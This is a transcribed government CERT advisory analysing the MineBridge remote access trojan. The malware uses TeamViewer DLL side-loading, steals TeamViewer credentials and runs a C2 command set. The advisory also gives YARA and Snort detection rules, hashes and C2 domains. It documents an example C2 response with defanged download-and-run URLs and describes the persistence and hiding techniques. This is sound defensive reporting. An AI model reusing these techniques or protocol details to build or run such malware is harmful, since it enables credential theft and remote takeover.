ADVISORY MINEBRIDGE MALWARE INTEGRATED WITH TEAMVIEWER APP
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Advisory MineBridge Malware Integrated with TeamViewer App aeCERT One of Telecommunications Regulatory Authority (TRA) Initiatives P O Box 116688, Dubai, United Arab Emirates (UAE) www.aecert.ae | www.tra.gov.ae Version: 1.0 Ref: ADV-19-028 Document Date: 07/04/2020
Document Details
Disclaimer
Whilst every effort has been made to ensure the accuracy of the information contained
within this report, aeCERT and the TRA bear no liability or responsibility for any
recommendations issued or inadvertent damages that could be caused by the recipient of
this information.
Accessing third-party links in this advisory will direct you to an external website. Please
note that aeCERT bears no responsibility for third-party website traffic. aeCERT will have
no liability to the entities for the content or use of the content available through the
hyperlinks that are referenced.
Contents
Contents 1
Summary 2
Details 2
MineBridge Installation 2
MineBridge Main Code 3
MineBridge and TVSpy Code Similarities 11
Tactics, Techniques, and Procedures 13
Host Indicators of Attack 13
Recommendations 18
References 18
1|PageSummary
As the leading trusted secure cyber coordination center in the region, aeCERT has researched
and found out about a remote access tool dubbed MineBridge. I t is a C++ remote access tool
that is integrated with TeamViewer app. It uses a vulnerable version of TeamViewer to load a
malicious DLL. MineBridge can communicate with a designated C2 server to receive further
commands to execute. The network communication with the C2 is not encrypted. MineBridge is
able to collect basic system information, download and run additional files received from the C2
server, and reboot or shutdown the system.
Details
MineBridge malware is deployed as a DLL that contains a conspicuous number of exported
functions. Most of the exported functions have the prefix “msi”, which is used for Microsoft
installation service application programming interface names. Among the exported functions,
only two have a meaningful code:
• DllRegisterServer: function to install the malware.
• DllMain: function to run the main code.
MineBridge Installation
The “DllRegisterServer” exported function is invoked using the regsvr32.exe program. Once
invoked, the malware verifies the name of the executable is regsvr32.exe or rundll32.exe in the
DllRegisterServer. If this is not the case, MineBridge terminate the process. Otherwise, the
malware downloads a zipped file from a hard-coded URL and saves the content in the hard-coded
filename (%TEMP%\~f75f3yu4fbhbgd.bin). The file is uncompressed inside the folder (r
%AppData%\Windows Media Player) using an open-source library. MineBridge verifies that the
name of the uncompressed file is TeamViewer.exe during the uncompression process. If so, the
file is renamed to wpvnetwks.exe. MineBridge deletes the temporary zipped file and copies the
executing MineBridge binary file to (%AppData%\Windows Media Player\msi.dll) when the
2|Pageprocess is completed. The function terminates by creating a new thread that ensures persistence
on the system.
To ensure persistence, MineBridge creates a shell link in the startup folder that points to the
malware binary. The malicious link is executed each time the system is started. This task is
achieved by creating an instance of a Component Object Model (COM) with:
• Class ID (CLSID): CLSID_ShellLink (00021401-0000-0000-c000-000000000046).
• Interface ID (IID): IID_IShellLinkW (000214f9-0000-0000-c000-000000000046).
The created object is an IshellLinkw that is used to create the shell link with the properties
described in the table below:
Name Value Description
Path Currently executing binary file, which is This property contains the path of the program
(after installation) the TeamViewer that must be executed on startup
executable, wpvnetwks.exe.
Description Windows WMI The description of the shell link object
Icon location WMIC.exe The shell link object location (path and index)
of the icon to use for the link file
Table 1
MineBridge queries the COM object to obtain the instance of the IPersistFile interface after the
shell link object is configured. This is done by invoking the QueryInterface function by specifying:
• IID: IID_IPersistFile (0000010b-0000-0000-c000-000000000046).
This new object is used to persist the link in the startup folder, whose location is obtained by
using the CSIDL_STARTUP value (0x7). The name of the created link file is Windows WMI.lnk.
MineBridge Main Code
In order to run the main MineBridge code, the TeamViewer.exe file should be executed. All the
files uncompressed during the installation step are legitimate TeamViewer files related to version
11.0.133222. This version was chosen because it contains a rather critical DLL side-loading
vulnerability, which is exploited by MineBridge to load its malicious DLL. The execution of the
malicious MineBridge DLL is achieved through the TeamViewer binary’s dependency on the
legitimate msi.dll file. However, this version of TeamViewer can be used to load an arbitrary file
named msi.dll due to a side-loading vulnerability.
3|PageInitialization
The malware verifies that the name of the file executed is not regsvr32.exe or rundll32.exe, and
ensures that the code of the DllMain function is not executed when the DLL is loaded as part of
the installation process. The initialization code proceeds to parse the command-line arguments,
and verifies whether the COM1_ argument is specified; if so, MineBridge sleeps for five seconds.
The next step is to fix the exported MSI function addresses. MineBridge loads the legitimate
msi.dll DLL and resolves all the function addresses that are exported from the malicious DLL in
order to work properly.
MineBridge ensures that the TeamViewer execution does not show any window on the screen or
perform actions that can alert the user of its execution by resolving the addresses of the functions
that might cause the display of content on the screen. Then, it will apply an inline hook using the
open-source project “mhook”. The list of the hooked functions is shown below:
• MessageBoxA
• MessageBoxW
• SetWindowTextW
• IsWindowVisible
• DialogBoxParamW
• ShowWindow
• RegisterClassExW
• CreateDialogParamW
• Shell_NotifyIconW
• GetAdapterInfo
• RegCreateKeyExW
• SetCurrentDirectoryW
• CreateMutexW
• CreateMutexA
• CreateFileW
The usage of the mhook library leads to the disclosure of the full path used to develop the
malware. This is due to the usage of the assert function inside the mhook code. When the assert
function is used, it instructs the compiler to insert a call to the function _wassert, passing as
parameters the string of the condition to check as well as the full name and line code of the file
that uses the assert function. This results in the disclosure of the following path:
4|Pagec:\users\maximys\desktop\eric_guft@jabbeer.com\mhook_lib\mhook_lib\disasmlib\disas
m.c
MineBridge computes a bot ID, which assumes the format of a Global Unique Identifier (GUID).
The computation is done using a Linear Congruential Generator (LCG) whose seed is based on
the hard disk volume serial number. The Python code that can be used to compute the
MineBridge bot ID is shown below:
volume_serial_number = 0x86949be0
tmp = (6125472 * volume_serial_number) & 0xFFFFFFFF
chunk1 = (tmp + 1266423) & 0xFFFFFFFF
tmp = (30624 * chunk1) & 0xFFFF
chunk2 = ((tmp + 21239) & 0xFFFF) / 5
tmp = (9216 * chunk1) & 0xFFFF
chunk3 = ((tmp - 425) & 0xFFFF)
chunk4 = (chunk1 * 87) & 0xFFFFFFFF
bot_id = "%06lX-%04lX-%04lX-%06lX" % (chunk1, chunk2, chunk3, chunk4)
print 'Bot ID: ' + bot_id
When the initialization step is completed, MineBridge starts two threads:
• The first one is used to record the last time that the window received user input.
• The second thread runs the main code that interacts with the C2 server.
C2 Communication
MineBridge collects information from the TeamViewer program before communicating with the
C2 server. MineBridge enters a loop where it sleeps for two seconds between iterations to ensure
that all information is collected before proceeding. The table below shows the information
collected in the SetWindowTextW hook function:
5|PageName Description
User ID MineBridge collects the TeamViewer-generated user ID by inspecting the title
parameter of the function, SetWindowTextW. In order to collect the user ID,
MineBridge verifies the length of the value by doing two checks: 1. If the length
is 13, MineBridge verifies that the character at positions (starting from 0) 1, 5,
and 9 is a space. 2. If the length is 11, MineBridge verifies that the character
(starting from 0) at position 3 and 7 is a space. These checks are performed
because TeamViewer uses a specific format to represent the user ID string (i.e., a
space character is added after every three characters). When the user ID is
identified, MineBridge removes the spaces from the user ID and saves the value
in a global variable that is used later in communication with the C2 server.
Connection Password MineBridge collects the TeamViewer-generated password by inspecting the title
parameter of the function, SetWindowTextW. MineBridge verifies that the
length of the value is 6 and if the check is satisfied, it verifies that the character
at position 1 (starting from 0) is not -. This check is necessary because in a
specific case, the SetWindowTextW function is called with the parameter value
E-mail, which might generate a false positive due to its length.
Table 2
A new thread is started that connects with C2 server after TeamViewer information is collected.
MineBridge proceeds to fingerprint the system to obtain the following information:
• Operating system (OS) version and installed service pack
• Username
• Computer name
This information is formatted and concatenated with:
• Bot ID
• TeamViewer user ID
• TeamViewer password.
Each field is separated by an ampersand (&) character, as shown below:
uuid=D1C9DEF7-1944-
BA574B9AC5F1&id=.1556171343&pass=958uiq&username=User&pcname=WINEO0PUM
J8E6G&osver=Windows 7 SP 1&timeout=70
The table below describes each query parameter:
Name Description
uuid The generated bot ID
id The TeamViewer user ID
pass The TeamViewer password
6|Pageusername The victim username
pcname The victim computer name
osver The OS version and installed service pack
timeout A hard-coded value used by MineBridge to sleep before sending a request to the C2 server. It
is expressed in milliseconds
Table 3
MineBridge sends the data using an HTTP POST request to the C2 server. The request uses the
following hard-coded user agent string:
Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5
(KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1
The server response contains the command that must be executed. MineBridge expects a
response format that starts with the d character or 0x00000000. In the second case, the
command value means that there is no task to execute, so MineBridge proceeds to sleep for
the specified timeout before trying to contact the C2 server again. In the first case, a command
name is expected. The response value is split in two times:
• First by the ampersand (&) character.
• Second time by an equal (=) character.
The server response is in the following format:
drun_command=[0,1]&drun_URL=[value]&rundll_command=[0,1]&rundll_URL=[value]&
update_command=[0,1]&update_URL=[value]&restart_command=[0,1]&terminate_co
mmand=[0,1]&kill_command=[0,1]&poweroff_command=[0,1]&reboot_command=[0,1]
&setint erval_command=[0,1]&setinterval_time=[value]
7|PageTherefore, an example response can be the following:
drun_command=0&drun_URL=http://bad[.]com/file.exe&rundll_command=0&rundll_URL=
http://bad[.]com/file.dll&update_command=1&update_URL=http://bad[.]com/update.exe
&restart_command=0&terminate_command=0&kill_command=0&poweroff_command=0&
reboot_command=0&setinterval_command=1&setinterval_time=1&kill_command=0&pow
eroff_command=0&reboot_command=0&setinterval_command=1&set interval_time=1
MineBridge Commands
MineBridge periodically contacts the C2 server for new commands to execute. It expects the
data to contain the keys listed in Table 5, when a response from the C2 server is received. If the
keys are not contained in the data, the data is considered invalid and the next C2 server on the
list is contacted. All commands are described by at least one parameter that tells the client
whether or not the command must be. MineBridge reads the command’s value from a different
parameter whose name depends on the specific command if the command requires additional
data.
The command string below provides information on the drun_command command.
drun_command=1&drun_URL=some value
The string is parsed in order to extract two values:
• A flag indicating whether the command must be executed (a value of 1 means that the
command must be executed)
• Value (in this case, the value is the string some value).
Once execution is complete, MineBridge sends a request to the C2 server to report the results
of the command. All HTTP requests sent from the client to the C2 server contain bot ID value
sent in a parameter named uuid.
The currently supported MineBridge commands and the name of the corresponding value
parameter required by the command are described in the table below:
8|PageName Value Description
drun_command drun_URL MineBridge performs the following actions:
• It creates a file with a random name in the %TEMP%
directory. The name has the following pattern: [0-9a-
zA-Z]{31}.exe.
• MineBridge downloads the file specified in the
drun_URL parameter and saves the content in the
temporary file.
• If the downloaded binary is a valid 32-bit Portable
Executable (PE), the file is executed by calling the
CreateProcessW function; otherwise, the file is
deleted.
After the completion of the tasks above, MineBridge
sends a request to the C2 server that includes the bot
ID and the parameter drun_status set to 1 if the task
succeeds 2 otherwise
rundll_command rundll_URL MineBridge performs the following actions:
• It creates a file with a random name in the %TEMP%
directory. The name has the following pattern: [0-9a-
zA-Z]{31}.
• MineBridge downloads the file specified in the
rundll_URL parameter and saves the content in the
created temporary file.
• It decrypts the file with an XOR algorithm that uses the
key, kernel32.dll. In the Appendix, Python code is
provided to decrypt the downloaded file.
• The resulting buffer is uncompressed by invoking
RtlDecompressBuffer.
• If the resulting uncompressed buffer is a valid PE file, a
new thread maps the PE content in memory and runs
it.
After the completion of the tasks above, MineBridge
sends a request to the C2 server that includes the bot
ID and the parameter rundll_status set to 1 if the task
succeeds, to the value 2 if the PE is not correctly
executed, or to the value 3 if the file was not
downloaded at all.
update_command update_URL MineBridge performs the following actions:
• It copies the MineBridge module name (msi.dll) to
msi.dll.old.
• MineBridge downloads the file specified in the
update_URL parameter and saves the content with the
module filename, which is msi.dll.
• It deletes the msi.dll.old file.
• MineBridge creates a new thread that sleeps for seven
seconds and then terminates the process. The sleep
operation is done to provide enough time to complete
the update process.
• It creates a new process providing as the filename the
current executing binary, which is wpvnetwks.exe (this
will result in the creation of a new instance of the
9|Pagevulnerable TeamViewer binary). The parameter COM1_
is also specified to inform the newly created process to
sleep for five seconds in order to provide enough time
to complete the update.
After the completion of the tasks above, MineBridge
sends a request to the C2 server that includes the bot
ID and the parameter update_status set to 1 if the task
succeeds and 2 otherwise.
restart_comman d MineBridge performs the following actions:
• It creates a new thread that sleeps for seven seconds
and then terminates the process.
• It sends a request to the C2 server that includes the bot
ID and the parameter restart_status set to 1.
• MineBridge creates a new process providing as the
filename the current executed binary, which is
wpvnetwks.exe (this results in the creation of a new
instance of the vulnerable TeamViewer binary). The
parameter COM1_ is also specified to inform the newly
created process to sleep for five seconds.
terminate_comm and This command sends a request to the C2 server that includes
the bot ID and the parameter terminate_status set to 1. After
the request is sent, MineBridge sends a window message to
the TeamViewer host application to terminate the process by
using the SendMessageW function.
kill_command This command sends a request to the C2 server that includes
the bot ID and the parameter kill_status set to 1. After the
request is sent, MineBridge creates and executes a batch file
named tvdell.cmd in the current working directory. The file’s
content is created dynamically from strings hardcoded in the
MineBridge binary. The batch file, whose content is provided
in the Appendix, deletes all MineBridge files. After the
execution of the batch file, the process is terminated.
poweroff_comma nd This command sends a request to the C2 server that includes
the bot ID and the parameter poweroff_status set to 1. After
the request is sent, MineBridge calls the ZwShutdownSystem
function with the input value 2, which results in shutting
down the system.
reboot_command This command sends a request to the C2 server that includes
the bot ID and the parameter reboot_status set to 1. After
the request is sent, MineBridge calls the ZwShutdownSystem
function with the input value 1, which results in rebooting
the system
setinterval_co mmand setinterval_time This command sends a request to the C2 server that includes
the bot ID and the parameter setinterval_status set to 1.
After the request is sent, MineBridge parses the
setinterval_time parameter value and updates a global
variable containing the timeout to sleep between each
request.
Table 4
10 | P a g eMineBridge and TVSpy Code Similarities
• The MineBridge commands update_command and kill_command are executed from a function
that compares the input data with a list of string values (whose values are described in Table 5),
and if a match is found, the related code is executed. Thus, this function acts as a command
processor.
• Every command in this list (other than update_command and kill_command) cannot be
executed by MineBridge because of a string comparison that filters these commands out.
• Both MineBridge and TVSpy download the TeamViewer binary from a remote location and use a
DLL side-loading vulnerability to load the malicious malware DLL.
• MineBridge contains dead code that utilizes the Windows messaging system to invoke the
command processor function via the WindowProc callback, which is a function that handles
messages sent to the window.
o When the WindowProc function is invoked, the lParam value is split by newlines and
each line is passed to the command processor function.
o When the command execution is completed, a new message is sent by invoking the
SendMessageW API function, specifying the custom value 0x7EA as the Msg parameter,
the command name as the wParam parameter, and the lParam parameter is used to
return the result of the command.
o Messages with a Msg value greater than 0x7E9 (as in the case mentioned above) are
handled by a different code path inside the WindowProc function. In particular, the
code obtains a handle to specific window control components by invoking the function
GetDlgItem, and sends three messages with values WM_SETFOCUS (0x7), WM_SETTEXT
(0xC), and BM_CLICK (0xF5).
This behavior is exactly the same as TVSpy RAT, where the command result is sent via the
TeamViewer chat feature by emulating keystrokes and clicking the send button. Despite having
this unique command processor code, MineBridge does not use it. This is another indication
that MineBridge may have been forked from the TVSpy RAT source code.
Table 5 provides a description of the command names used for comparison. Some of the names
are identical to those found in the TVSpy RAT. While all of the commands listed in Table 5 are
implemented in MineBridge, their code paths are not reachable. Therefore, they may be
artefacts from an older codebase or from TVSpy RAT.
Name Description Present in TVSpy
update This command contains a code path that is followed Yes
when the update_command command is received from
the C2 server.
kill This command contains a code path that is followed No, but similar to delproc
when the kill_command command is received from the
C2 server.
control This sends a message to TeamViewer to change its No
status to connected
11 | P a g erestart This restarts the system by executing the same steps as Yes
the command, reboot_command
terminate This command shuts down the system by executing the No
same steps as the command, poweroff_command
reboot This shuts down the system by executing the same No
steps as the command, reboot_command.
poweroff This is an alias for the reboot command. Yes
tasklist This lists all running processes on the system. For each No, but similar to applist
process, the name and the process ID are return
admin This command returns a value specifying whether the No
process is running with administrator privileges
minwnd This minimizes all TeamViewer windows No
time This retrieves the local time Yes
locale This command retrieves the keyboard layout Yes
idle This retrieves the last time that a user input was No
received. This command reads from a global variable
that is updated in a separate thread.
cmd This command executes a program through the default No
command shell. The command shell path is obtained by
resolving the environment variable, %COMSPEC%.
wcmd This command is the same as cmd, but the /C argument Yes
is passed to the command shell program
fuac This restarts the process by using the following No
commandline: runas wmic process call create . This command executes the program with
Administrator privileges; however, it is not a User
Account Control (UAC) bypass, since the command
execution shows the UAC windows to the user.
mic This enables or disables audio recording from the No, but similar to startaudio and
microphone of the infected computer stopaudio
rundll This command executes the same operation of the No, but similar to run
rundll_command task—the only notable difference is
that an .xpdf extension is added to the temporary
filename.
deldll This command deletes a file whose path is received as No
input. Before deleting the file, the .xpdf extension is
added to the file.
Table 5
12 | P a g eTactics, Techniques, and Procedures
The following TTPs may be used to characterize the activity of MineBridge:
• Use of the vulnerable TeamViewer application version 11.0.133222
• MineBridge communicates with the C2 server through HTTP POST requests
• The communication with the C2 server is not encrypted
• MineBridge saves the downloaded TeamViewer binary and the malicious DLL in the
%APPDATA%\ Windows Media Player directory
• The files downloaded by MineBridge are temporarily saved in the %TEMP% directory using the
pattern [0-9a-zA-Z]{31} for the filename
• Persistence is obtained by creating a link file in the startup folder
• MineBridge removes itself from the system by creating and running a batch file, which deletes
all downloaded files
Host Indicators of Attack
The tables below detail files belonging to MineBridge campaigns including filename, SHA256
hash, and build time when known
Executables
Filename SHA256 hash Build time (UTC)
Msi.dll 57671d5154e707da0ee6139485f45a50fa9221852ebb657 2018-09-22 18:02:53
81d45a2660da7d0cb
Msi.dll (unpacked) 1d81da0d1b043bc48ccbff03c72007728ff09e219c204827c 2020-01-24 19:14:00
fe341719c27bcb7
21d37af3705816386bb1b 86d1637975059d6b5cdef0564d764401c703a4629a6413c 2010-08-01 10:32:37
59934d695e6.virus 7b9b77d7487f7836f
c9b4b614271e45bc6e41b5d7590cc6418a8f7281697508c 2019-03-05 18:41:12
983720a43723a75b2
9d8619002a390f35a6b6e02c5275026f8872f8c1a45df2d2 2019-03-05 18:41:12
8527341012e49016
Table 6
Related Files
Filenames SHA256 hash
%TEMP%/~f75f3yu4fbhbgd.bin 76a13e4caefbffc50c2c1ed3023e9041 fd4c3f4cb1947262caf3e241b127503c
Table 7
File System
The presence of one or more of the following files may indicate a MineBridge infection:
File path Description
Windows WMI.lnk Link file used for system persistence
tvdell.cmd Batch file to remove MineBridge files
Table 8
13 | P a g eThe presence of files with paths matching the following pattern(s) may indicate a MineBridge
infection.
Patterns Description
%TEMP%\[0-9a-zA-Z]{31} Temporary downloaded files
Table 9
YARA Rules
rule CrowdStrike_CSIT_20032_01 : ecrime graceful_spider minebridge rat unpacked {
meta:
copyright = "(c) 2020 CrowdStrike Inc."
description = "Detects strings and opcodes present in MineBridge"
reports = "CSIT-20032"
version = "202003111132"
last_modified = "2020-03-11"
actor = "GRACEFUL SPIDER"
malware_family = "MineBridge"
14 | P a g eauthor = "aparata"
labels = "ecrime,graceful_spider,minebridge,rat,unpacked"
strings:
// server command names
$cmd_name1 = "drun_command"
$cmd_name2 = "drun_URL"
$cmd_name3 = "rundll_command"
$cmd_name4 = "rundll_URL"
$cmd_name5 = "update_command"
$cmd_name6 = "update_URL"
$cmd_name7 = "restart_command"
$cmd_name8 = "terminate_command"
$cmd_name9 = "kill_command"
$cmd_name10 = "poweroff_command"
$cmd_name11 = "reboot_command"
$cmd_name12 = "setinterval_command"
$cmd_name13 = "setinterval_time"
// client response
$cmd_response1 = "uuid=%s&drun_status="
$cmd_response2 = "uuid=%s&kill_status="
$cmd_response3 = "uuid=%s&poweroff_status="
$cmd_response4 = "uuid=%s&reboot_status="
$cmd_response5 = "uuid=%s&restart_status="
$cmd_response6 = "uuid=%s&rundll_status="
$cmd_response7 = "uuid=%s&setinterval_status="
$cmd_response8 = "uuid=%s&terminate_status="
$cmd_response9 = "uuid=%s&update_status="
$cmd_response10 = "uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d"
/*
15 | P a g ebot ID uuid generator part 1
81 C6 F7 52 13 00 add esi, 1352F7h
69 C6 00 24 00 00 imul eax, esi, 2400h
69 D6 A0 77 00 00 imul edx, esi, 77A0h
*/
$bot_ID_gen_code1 = {81 C6 F7 52 13 00 69 C6 00 24 00 00 69 D6 A0 77
00 00}
/*
bot ID uuid generator part 2
0F B7 C8 movzx ecx, ax
69 C6 00 80 92 26 imul eax, esi, 26928000h
05 57 BA C7 01 add eax, 1C7BA57h
*/
$bot_ID_gen_code2 = {0F B7 C8 69 C6 00 80 92 26 05 57 BA C7 01} condition:
uint16(0) == 0x5a4d and (
(3 of ($cmd_name*)) or
(any of ($cmd_response*)) or
(any of ($bot_ID_gen_code*))
)
}
Network Artifacts:
Infrastructure for MineBridge:
Infrastructure Connection type Description
https[:]//creatorz123[.]top/~files_tv/~all_files_m.bin Port 443/TCP Vulnerable TeamViewer zip
file
compilator333[.]top Port 443/TCP C2
123faster[.]top Port 443/TCP C2
conversia91[.]top Port 443/TCP C2
fatoftheland[.]top Port 443/TCP C2
Table 10
16 | P a g eSnort Rules:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "MineBridge C2 server
communication [CSIT-20032]";\
flow:from_client, established;\
content: "POST"; http_method; nocase;\
content: "uuid="; http_client_body; offset: 0; depth:5; nocase;\
content: "&id="; http_client_body; offset: 32; depth:4; nocase;\
content: "&pass="; http_client_body; offset: 47; depth:6; nocase;\
content: "&username="; http_client_body; offset: 59; depth:10; nocase;\
content: "&pcname="; http_client_body; offset: 70; nocase;\
content: "&osver="; http_client_body; offset: 79; nocase;\
content: "&timeout="; http_client_body; offset: 87; fast_pattern; nocase;\
classtype: trojan-activity;\
rev:20200320;\
sid:8001604; reference:url,falcon.crowdstrike.com/intelligence/reports/CSIT20032;)
ATT&CK Framework:
Tactic Technique Observable
Execution T1117: Regsvr32 The MineBridge DLL can be
executed via Regsvr32
T1085: Rundll32 The MineBridge DLL can be
executed via Rundll32
T1072: Third-Party Software MineBridge uses TeamViewer in
order to load the malicious DLL
Persistence T1060: Registry Run Keys / Startup MineBridge creates a link in the
Folder startup folder to ensure
persistence
Defense evasion T1073: DLL Side-Loading MineBridge uses a DLL side-loading
vulnerability in TeamViewer to load
the malicious DLL
Collection T1119: Automated Collection MineBridge collects system
information that is sent to the C2
server during the first request
Command and control T1043: Commonly Used Port MineBridge uses port 443 (HTTPS)
to communicate with the C2 server
T1071: Standard Application Layer MineBridge uses HTTPS protocol to
Protocol communicate with the C2 server
17 | P a g eImpact T1529: System Shutdown/Reboot MineBridge is able to shut down or
reboot the system upon receiving a
specific command from the C2
server
Table 11
Recommendations
To avoid exploitation due to the presence of the vulnerability, it is highly recommended to have
the latest security updates installed.
References
CrowdStrike
18 | P a g eaeCERT Contact Info
P.O. Box 116688
Dubai, United Arab Emirates
Tel (+971) 4 777 4003
Fax (+971) 4 777 4100
Email incident[at]aeCERT.ae
Instagram @TheUAETRA
Twitter @TheUAETRA
For secure communications with aeCERT with regards to sensitive or vulnerability
information please send your correspondences to incident[at]aeCERT.ae
19 | P a g eYou can also read
